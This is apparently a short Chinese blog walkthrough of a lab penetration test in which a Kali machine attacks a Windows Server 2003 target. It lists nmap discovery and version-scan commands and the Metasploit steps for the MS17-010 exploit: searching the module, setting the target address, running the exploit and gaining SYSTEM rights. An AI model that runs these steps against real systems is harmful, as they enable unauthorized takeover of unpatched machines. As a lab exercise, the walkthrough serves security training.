主机 渗透

1:kali

靶机:Windows Server 2003

端口扫描

1.用nmap端口扫描靶机

nmap -sP 192.168.157.0/24 #扫描192.168.157.0这个网段存活的主机

靶机的IP为192.168.157.130

2

nmap -sV192.168.157.130 -p- #-sV 参数用于启用版本检测,192.168.157.130 是目标主机的IP地址,-p- 参数用于扫描所有端口

msfconsole
1. ms17_101

search ms17_010 #询问有关"ms17_010"的漏洞信息

2.use

use 1 #利用1这个模块

3.options

show options #列出模块所需的各种参数

4.set

set rhosts 192.168.157.130 # 设置远程目标主机的IP地址为192.168.157.130

5.exploit

exploit #执行攻击

6.获得system32,Windows最高权限

相关推荐
yunfuuwqi5 小时前
OpenClaw✅真·喂饭级教程:2026年OpenClaw(原Moltbot)一键部署+接入飞书最佳实践
运维·服务器·网络·人工智能·飞书·京东云
九河云5 小时前
5秒开服,你的应用部署还卡在“加载中”吗?
大数据·人工智能·安全·机器学习·华为云
迎仔5 小时前
C-算力中心网络隔离实施方法:怎么搞?
运维·网络
代码游侠5 小时前
C语言核心概念复习——网络协议与TCP/IP
linux·运维·服务器·网络·算法
ShoreKiten5 小时前
ctfshowweb351-360
web安全·ssrf
枷锁—sha5 小时前
【SRC】SQL注入WAF 绕过应对策略(二)
网络·数据库·python·sql·安全·网络安全
Zach_yuan6 小时前
深入浅出 JSONCpp
linux·服务器·网络·c++
桌面运维家7 小时前
vDisk安全启动策略怎么应用?防止恶意引导攻击
安全
我是一只puppy7 小时前
使用AI进行代码审查
javascript·人工智能·git·安全·源代码管理
迎仔8 小时前
B-算力中心网络隔离的必要性:为什么必须隔离?
网络